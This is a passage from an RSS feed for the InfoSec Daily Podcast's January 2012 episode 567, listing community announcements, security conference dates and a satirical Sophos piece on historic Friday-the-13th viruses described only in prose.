	Brad and his wife did not ask for this help, but as a community we feel that if we can help we want to. &#160;Please feel free to check in for status or to donate. &#160;Either way we thank you and I know Brad thanks your for your support, prayers and positive thoughts.
	http://www.social-engineer.org/brad-smith-updates/
	http://www.social-engineer.org/bradsmithdonation/
	Anti PIPA/SOPA Meetup
	Meetup Groups across the country are mobilizing to help stop
	SOPA and PIPA, as we will very potentially see PIPA&#039;s passage
	in the next two weeks if we don&#039;t act.
	We at Meetup HQ are alerting members of the New York Tech
	community about a chance to organize together. The NY Tech
	Meetup, New York&#039;s largest Tech Meetup, has scheduled an
	emergency Meetup on Wednesday, January 18. In order to build
	critical mass and maintain an organized event *please RSVP in
	the NY Tech Meetup* if you want to participate.
	Go here to RSVP: http://www.meetup.com/ny-tech/events/47879702/
	CampusCon 2012
	When: January 21, 2012
	Where: WIT {Waterford Institute of Technology} Sports &#8211; Waterford, Ireland
	http://campuscon.hackingwit.com
	(from Baconzombie)
	New England InfoSec Tweetup
	When: January 21, 2012
	Where: Ledgewood Hills Clubhouse &#8211; Nashua, NH
	http://neistu3.eventbrite.com/
	SANS Mentoring: Security 401 SANS Security Essentials Bootcamp Style
	When: Starts January 24, 2012
	Where: Atlanta, GA
	Discount Code:
	http://www.sans.org/mentor/details.php?nid=25484
	ShmooCon 2012
	When: January 27th-29th, 2012
	Where: Washington Hilton Hotel, Washington, DC
	http://www.shmoocon.org
	Schmoocon Epilogue
	When: After Schmoocon
	Where: Washington, DC
	Hit up anyone in NOVA Hackers
	Metasploit Framework Unleashed Cincinnati
	When: February 11, 2012.
	Where: Digitorium in Griffin Hall, the home of Northern Kentucky University&#8217;s College of Informatics
	https://msfucincy.wordpress.com/
	$20 donation for #HFC
	Social Engineering Training
	When: March 5-9, 2012
	Where: Seattle, Washington
	When: July 21-24, 2012
	Where: Black Hat Vegas
	When: August 20-24, 2012
	Where: &#160;Bristol, UK
	When: &#160;November 12-16, 2012
	Where: &#160;Columbia, MD
	http://www.social-engineer.com/social-engineer-training
	BSides Chicago
	When: Saturday, April 28th, 2012
	Where: Volcano Room (further info coming)
	Cost: Free (as always!) &#8211; Registration opening soon!
	http://www.securitybsides.com/w/page/48444703/BSidesChicago-2012
	They&#8217;re looking for sponsors, so if you know someone, pass it on.
	Linuxfest Northwest 2012[...]</itunes:summary>
		<itunes:keywords>Podcast</itunes:keywords>
		<itunes:author>Rick Hayes with Dave Kennedy, Boris Sverdlik, Beau Woods, Adrian Crenshaw, Karthik Rangarajan, Geordy Rostad, Themson Mester, Dr. Bonez, and Varun Sharma.</itunes:author>
		<itunes:explicit>no</itunes:explicit>
		<itunes:block>no</itunes:block>
	</item>
		<item>
		<title>Episode 567 &#8211; Friday 13th, Facebook Security Scam, Cyber Insurance, Sykipot, When Your Google Skills Fail &amp; SOPA Soundoff</title>
		<link>http://www.isdpodcast.com/episode-567-friday-13th-facebook-security-scam-cyber-insurance-sykipot-when-your-google-skills-fail-sopa-soundoff</link>
		<comments>http://www.isdpodcast.com/episode-567-friday-13th-facebook-security-scam-cyber-insurance-sykipot-when-your-google-skills-fail-sopa-soundoff#comments</comments>
		<pubDate>Sat, 14 Jan 2012 01:57:43 +0000</pubDate>
		<dc:creator>rick.hayes</dc:creator>
				<category><![CDATA[Podcast]]></category>

		<guid isPermaLink="false">http://www.isdpodcast.com/?p=3368</guid>
		<description><![CDATA[InfoSec Daily Podcast Episode 567 for January 13, 2012. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, Geordy Rostad, and Dr. Bonez. &#160; Announcements: Unsung Heros Have you ever stumbled on a tool and wondered &#8220;Why didn&#8217;t I know this existed!&#8221; or &#8220;If only I&#8217;d had this last week on that test&#8221;&#8230; Chris John [...]]]></description>
			<content:encoded><![CDATA[<p><span style="font-size:15px;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">InfoSec Daily Podcast Episode 567 for January 13, 2012. &nbsp;</span><span style="font-size:15px;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, Geordy Rostad, and Dr. Bonez.</span><br />
	&nbsp;</p>
<div dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Announcements:</span></div>
<div dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Unsung Heros</span></div>
<div dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Have you ever stumbled on a tool and wondered &ldquo;Why didn&rsquo;t I know this existed!&rdquo; or &ldquo;If only I&rsquo;d had this last week on that test&rdquo;&hellip; Chris John Riley has started to gather suggestions for your &ldquo;unsung hero&rdquo; of the tools world. &nbsp;He is looking specifically to gather a list of tools that aren&rsquo;t on every penetration testers, or forensic investigators list, but that you have respect for. &nbsp;</span><a href="http://blog.c22.cc/2012/01/13/unsung-heros"><span style="font-size:15px;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://blog.c22.cc/2012/01/13/unsung-heros</span></a></div>
<p>
	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Information Security Blogger Awards 2012</span><br />
	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Since we were over looked again for the Best Podcast on Security </span><span style="font-size:15px;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">you can email </span><a href="mailto:ashimmy@hotmail.com"><span style="font-size:15px;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">ashimmy@hotmail.com</span></a><span style="font-size:15px;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> with your name, email address and ISD Podcast as your write-in nominee. &nbsp;Please note, you have to provide your blog or podcast URL so that it can be verified that you are a blogger or podcaster. &nbsp;Vote for your favorite blogs as well on </span><a href="http://www.ashimmy.com/"><span style="font-size:15px;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">www.ashimmy.com</span></a><span style="font-size:15px;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">.</span></p>
<p>	<span style="font-size:15px;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Brad Smith (theNurse)</span><br />
	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">We all know and love Brad Smith, aka theNurse. &nbsp;His humor and smiling positivity is a wonderful example for our community. &nbsp;At Hacker Halted he had a massive stroke and has been in the hospital ever since.</span></p>
<p>	<span style="font-size:15px;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Brad and his wife did not ask for this help, but as a community we feel that if we can help we want to. &nbsp;Please feel free to check in for status or to donate. &nbsp;Either way we thank you and I know Brad thanks your for your support, prayers and positive thoughts.</span></p>
<p>	<a href="http://www.social-engineer.org/brad-smith-updates/"><span style="font-size:15px;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.social-engineer.org/brad-smith-updates/</span></a><br />
	<a href="http://www.social-engineer.org/bradsmithdonation/"><span style="font-size:15px;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.social-engineer.org/bradsmithdonation/</span></a></p>
<p>	<span style="font-size:15px;color:#222222;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Anti PIPA/SOPA Meetup</span><br />
	<span style="font-size:15px;color:#222222;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Meetup Groups across the country are mobilizing to help stop</span><br />
	<span style="font-size:15px;color:#222222;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">SOPA and PIPA, as we will very potentially see PIPA&#39;s passage</span><br />
	<span style="font-size:15px;color:#222222;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">in the next two weeks if we don&#39;t act.</span></p>
<p>	<span style="font-size:15px;color:#222222;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">We at Meetup HQ are alerting members of the New York Tech</span><br />
	<span style="font-size:15px;color:#222222;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">community about a chance to organize together. The NY Tech</span><br />
	<span style="font-size:15px;color:#222222;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Meetup, New York&#39;s largest Tech Meetup, has scheduled an</span><br />
	<span style="font-size:15px;color:#222222;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">emergency Meetup on Wednesday, January 18. In order to build</span><br />
	<span style="font-size:15px;color:#222222;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">critical mass and maintain an organized event *please RSVP in</span><br />
	<span style="font-size:15px;color:#222222;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">the NY Tech Meetup* if you want to participate.</span></p>
<p>	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Go here to RSVP: </span><a href="http://www.meetup.com/ny-tech/events/47879702/"><span style="font-size:15px;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.meetup.com/ny-tech/events/47879702/</span></a></p>
<p>	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">CampusCon 2012</span><br />
	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: January 21, 2012</span><br />
	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: WIT {Waterford Institute of Technology} Sports &#8211; Waterford, Ireland</span><br />
	<a href="http://campuscon.hackingwit.com/"><span style="font-size:15px;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://campuscon.hackingwit.com</span></a><br />
	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">(from Baconzombie)</span></p>
<p>	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">New England InfoSec Tweetup</span><br />
	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: January 21, 2012</span><br />
	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Ledgewood Hills Clubhouse &#8211; Nashua, NH</span><br />
	<a href="http://neistu3.eventbrite.com/"><span style="font-size:15px;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://neistu3.eventbrite.com/</span></a></p>
<p>	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">SANS Mentoring: Security 401 SANS Security Essentials Bootcamp Style</span><br />
	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: Starts January 24, 2012</span><br />
	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Atlanta, GA</span><br />
	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Discount Code:</span><br />
	<a href="http://www.sans.org/mentor/details.php?nid=25484"><span style="font-size:15px;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.sans.org/mentor/details.php?nid=25484</span></a></p>
<p>	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">ShmooCon 2012</span><br />
	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: January 27th-29th, 2012</span><br />
	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Washington Hilton Hotel, Washington, DC</span><br />
	<a href="http://www.shmoocon.org/"><span style="font-size:15px;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.shmoocon.org</span></a></p>
<p>	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Schmoocon Epilogue</span><br />
	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: After Schmoocon</span><br />
	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Washington, DC</span><br />
	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Hit up anyone in NOVA Hackers</span></p>
<p>	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Metasploit Framework Unleashed Cincinnati</span><br />
	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: February 11, 2012. </span><br />
	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Digitorium in Griffin Hall, the home of Northern Kentucky University&rsquo;s College of Informatics</span><br />
	<a href="https://msfucincy.wordpress.com/"><span style="font-size:15px;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">https://msfucincy.wordpress.com/</span></a><br />
	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">$20 donation for #HFC</span></p>
<p>	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Social Engineering Training</span><br />
	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: March 5-9, 2012<br />
	Where: Seattle, Washington</span><br />
	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: July 21-24, 2012<br />
	Where: Black Hat Vegas</span><br />
	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: August 20-24, 2012</span><br />
	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: &nbsp;Bristol, UK</span><br />
	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: &nbsp;November 12-16, 2012<br />
	Where: &nbsp;Columbia, MD </span><br />
	<a href="http://www.social-engineer.com/social-engineer-training"><span style="font-size:15px;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.social-engineer.com/social-engineer-training</span></a></p>
<p>	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">BSides Chicago<br />
	</span><span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: Saturday, April 28th, 2012<br />
	Where: Volcano Room (further info coming)</span><br />
	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Cost: Free (as always!) &#8211; Registration opening soon!</span><br />
	<a href="http://www.securitybsides.com/w/page/48444703/BSidesChicago-2012"><span style="font-size:15px;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.securitybsides.com/w/page/48444703/BSidesChicago-2012</span></a><br />
	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">They&rsquo;re looking for sponsors, so if you know someone, pass it on.</span></p>
<p>	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Linuxfest Northwest 2012</span><br />
	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: Saturday, April 28th-29th, 2012</span><br />
	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Bellingham Technical College &#8211; Bellingham, WA</span><br />
	<a href="http://www.linuxfestnorthwest.org/"><span style="font-size:15px;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.linuxfestnorthwest.org/</span></a><br />
	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">CFP now open!</span></p>
<p>	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">AIDE 2012</span><br />
	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: May 21-25, 2012</span><br />
	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: MU Forensic Science Center</span><br />
	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Huntington, West Virginia </span><br />
	<a href="http://aide.marshall.edu/"><span style="font-size:15px;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://aide.marshall.edu</span></a><br />
	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">CFP now open!</span></p>
<p>	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">LayerOne 2012</span><br />
	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: May 26-27, 2012</span><br />
	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Clarion Hotel &#8211; Anaheim, CA</span><br />
	<a href="http://www.layerone.org/"><span style="font-size:15px;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.layerone.org</span></a><br />
	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">CFP now open!</span></p>
<p>	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">DerbyCon 2012 &#8211; &quot;Dropping the Deuce&quot;</span><br />
	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: &nbsp;September 27-30, 2012</span><br />
	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Louisville, KY</span><br />
	<a href="http://www.derbycon.com/"><span style="font-size:15px;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.derbycon.com</span></a></p>
<p>	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Thanks to everyone that has purchased products from Amazon through the affiliate program. &nbsp;If you&rsquo;re not familiar with the affiliate program, simply go to</span><a href="../"><span style="font-size:15px;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.isdpodcast.com</span></a><span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> and locate the Affiliate Program link on the right hand side.</span></p>
<p>	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><div class="awshortcode-carrousel align&amp;quot;right&amp;quot;"><object type="application/x-shockwave-flash" data="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" width="600" height="200"><param name="movie" value="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" /><param name="bgcolor" value="#fff" /><param name="quality" value="high" /><param name="allowscriptaccess" value="always" /><param name="wmode" value="transparent" /><p>You don't have a sufficient version of Flash Player to display this animation.</p></object></div></span><br />
	&nbsp;</p>
<div dir="ltr" style="margin-left: 5pt;margin-right: 5pt;text-indent: -4pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Stories</span></div>
<div dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: </span><a href="http://nakedsecurity.sophos.com/2012/01/13/friday-the-thirteenth-in-memory-of-malware-mayhem"><span style="font-size:15px;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://nakedsecurity.sophos.com/2012/01/13/friday-the-thirteenth-in-memory-of-malware-mayhem</span></a></div>
<div dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">It&#39;s Friday the Thirteenth, an infamous date in the history of malware.</span></div>
<div dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">So here&#39;s a satirical trip down memory lane to consider other </span><span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:italic;font-variant:normal;text-decoration:none;vertical-align:baseline;">dies irae</span><span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> in the computer virus calendar:</span></div>
<div dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">* Jerusalem virus</span><span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> &#8211; </span><span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:italic;font-variant:normal;text-decoration:none;vertical-align:baseline;">deletes files on any Friday the 13th from 1988 onwards</span><span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">.</span></div>
<div dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">This virus came out in 1987 but explicitly suppressed its payload that year (when Friday 13ths happened in February, March and November). In those pre-internet malware days, it needed to give itself months to spread before making its bid for infamy.</span></div>
<div dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">* Durban virus</span><span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> &#8211; </span><span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:italic;font-variant:normal;text-decoration:none;vertical-align:baseline;">zaps your hard disk on any Saturday the 14th</span><span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">.</span></div>
<div dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The Durban virus first appeared in South Africa, following advice to South African public servants to &quot;put their computer clocks forward a day&quot; before going home on Thursday 12th, as a temporary mechanism to minimise the risk of damage from the Jerusalem virus.</span></div>
<div dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">* Sunday virus</span><span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> &#8211; </span><span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:italic;font-variant:normal;text-decoration:none;vertical-align:baseline;">deletes files every Sunday, and asks you &quot;Today is SunDay! Why do you work so hard?&quot;</span></div>
<div dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Except, however, that it doesn&#39;t actually trigger its warhead due to a bug. You can imagine why the malware author didn&#39;t get around to testing that part of the code.</span></div>
<div dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">* Honni virus</span><span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> &#8211; </span><span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:italic;font-variant:normal;text-decoration:none;vertical-align:baseline;">pops up a picture of Erich Honecker on Saturday 13 August 1994</span><span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">.</span></div>
<div dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">That&#39;s the 33rd anniversary of the creation of the Berlin Wall. The late and unlamented Honecker, former leader of the DDR, had recently died in exile in Chile.</span></div>
